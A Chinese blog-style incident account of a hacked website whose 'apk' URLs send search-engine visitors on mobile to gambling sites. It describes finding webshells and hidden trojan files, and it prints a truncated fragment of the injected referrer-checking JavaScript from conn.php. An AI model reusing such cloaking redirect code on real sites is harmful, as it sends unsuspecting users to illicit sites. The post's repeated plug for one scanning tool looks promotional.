访问站点只要后面目录带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转到博彩网站,如果是电脑PC浏览器,就会弹空白页访问站点,让你看不到跳转后的网址,只要域名后面地址带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转bc网站,如果是电脑浏览器,就会弹空白页,最近也加上客户订单越来越少,领导也是着急,很大一部分客户渠道来源都从百度点击来的,静下心来看看网站到底是怎么回事,不看不要紧,简直吓我一跳。网站在百度里的收录增加许多,本来以为是更新的文章导致的,可是仔细一想也没那么多的收录呀,site:网站,点击到十页以后竟然发现了问题的关键,百度收录了一大堆我们网站没有的URL链接,复制那个我们域名的链接,提示不存在,从百度收录点进去跳转到BC网站。
排查过程
最初判断可能是修改了js文件,但经过长时间的浏览,文件内容搜索等等该用上的技能都用上了,头皮都发麻了,翻了2个小时,都没有发现js修改的一点痕迹,而且发现这个服务器的所有站点都有这个问题,看起来事情并不简单,现在的当务之急是尽快解决这个问题,否则影响太大。通过服务器的SINESAFE木马查杀工具,查杀出多个变形的webshell,以及隐藏属性无法删除的木马文件,本地扫描两个上传文件,火绒均报毒。
我这才明白过来,原来是我网站被黑了。赶紧打开服务器里的各个站点,下载网站程序代码到本地,然后挨个对每一个代码进行查看,查看是不是网站被黑客植入了木马后门,果不其然在每个网站根目录里的conn.php发现了黑客插入的恶意代码:
functiongo_bots_url(){varinit_flag="apk",bct=document.referrer,bot=['baidu','google','yahoo','bing','soso','sogou','360.cn','so.com','youdao','anquan','sm.cn'];//,'haosou'];for(variinbot){if(bct.indexOf(bot[i])!=-1){init_flag="apk";
去除掉恶意代码后,网站从百度搜索点击进来的也正常显示了,真是太无耻了,在服务器中查看隐藏属性的文件普通肉眼是看不到的,需要用专门的SINESAFE木马查杀工具才能看到,怪不得我找了大半天都没找到问题根源。接下来的工作就是抓紧修复网站漏洞,以及对服务器上的所有站点进行排查和漏洞修复,防止被再次攻击跳转,如果大家对程序代码不太熟悉无法修复漏洞的话可以到网站安全公司去看看。